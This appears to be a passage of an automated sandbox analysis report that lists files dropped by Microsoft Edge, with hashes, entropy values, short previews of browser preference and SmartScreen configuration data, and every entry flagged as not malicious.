                                                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17451), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17451
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.481376714809044
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.208346372402335
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:strJ99QTryDigabatSuypMsbusZihUkXiL8hbV+FXnICQA66WpaFIMYKPXYJ:strPGKSu4MsbufhBbGXLQx6WpaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:D6A23E205CBCF8669991C117245F1948
                                                                                                                                                                                                                                                                                                                                                        SHA1:0EA51195821CC4602372516E43730CA25B457207
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2CCA5E442D4FFE06F9BA17209340411FC752B968A7850BDB6D921A49F30A5E49
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEDF4D085532971FA771E52679189E878FA3BCD99EAA26FD4B84CAF9CEE7B463AA90B3F5A376D0203D75C832B83F5CDB3E7688D24BD9A4056B5A8FD7D85F1C3F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):81
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):130439
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):575056
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):460992
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                                                        MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                                                        SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):9
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                                                        MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                                                        SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:uriCache_
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.010739368736396
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclUFUE/dNV:YWLSGTt1o9LuLgfGBPAzkVj/T8lUuE/5
                                                                                                                                                                                                                                                                                                                                                        MD5:14F8B9327213CF35FC095D98E6895731
                                                                                                                                                                                                                                                                                                                                                        SHA1:C681CFF105923B071A20A238B6E64E015509FABA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:10EB2D70DA9DBA5DB33D9FFE2255FC40921126552D9B3C7EC5ECBF776048FCB7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1A59ECF38725D2D00924840D6FFA2A41CE674A39D7EF904920F3BAF39D50201F469468430616B2C0FE295DA71B13F57A75B8FBD67D6041AEB3DA2C0DD420DC68
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1731695175690085}]}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                                                        MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                                                        SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                                                                        SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44604
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0965305519764375
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBwwukhDO6vP6OWeKDXTaJFPm0cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEU67chu3VlXr4CRo1
MD5:DFCA891CCB3089E4FB5BF3BCF3BD469A
SHA1:FD7EA6A40FC1C11968756BFF49BD4D29CE90F610
SHA-256:A7C06659739D9289EA1801A1D9B82B1CC2926F5AD62D8E24C71F36EC601532CA
SHA-512:CD2E0F3959173A6A23EFEC6F88FD854D5737F9C0C24E7839724B2975F397799FCC7F74FA8B5F4DFB1F3E721920C057DCB1390CACD2BDD29048B0575B1576F644
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):45680
Entropy (8bit):6.088247304093352
Encrypted:false
SSDEEP:768:mMkbJrT8IeQcrQgx9ro2uBhDO6vP6OWeCh5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8HR9rf69sIahfX7KRoVhu3VlXS
MD5:408FCBE7C5636A160196328842C1D551
SHA1:11485381A0263BCE6065E960573F9E2BD08729E3
SHA-256:B33226CBF7871FB454B5F164075C861B94A86E559A56CFBD73EE0401000A6718
SHA-512:7DC86B6AA12ADA2F0DC2899367ECDC69382FE7B270FC7DBD34B9C744EAFED639B1773C19B6E63F7368A9DDFFA02AEB4B7CC54FA591F9D20DAB39D85BDE0E5AFD
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):45804
Entropy (8bit):6.0880154808559555
Encrypted:false
